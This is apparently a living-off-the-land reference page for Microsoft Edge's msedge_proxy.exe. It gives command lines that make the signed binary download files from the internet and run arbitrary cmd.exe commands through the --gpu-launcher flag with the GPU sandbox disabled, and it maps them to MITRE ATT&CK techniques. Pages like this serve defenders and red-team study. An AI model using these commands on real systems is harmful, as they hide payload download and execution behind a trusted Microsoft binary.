.. /msedge_proxy.exe
Star

Microsoft Edge Browser

Paths:

C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe

Acknowledgements:

Mert Daş (@merterpreter)

Download

msedge_proxy will download malicious file.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe http://example.com/test.zip

Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105

Edge will silently download the file.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\Desktop\\test.json &&"

Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105

Execute

msedge_proxy.exe will execute file in the background

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c ping google.com &&"

Usecase: Executes a process under a trusted Microsoft signed binary
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1218

.. /msedge_proxy.exe Star

Download

Execute

.. /msedge_proxy.exe
Star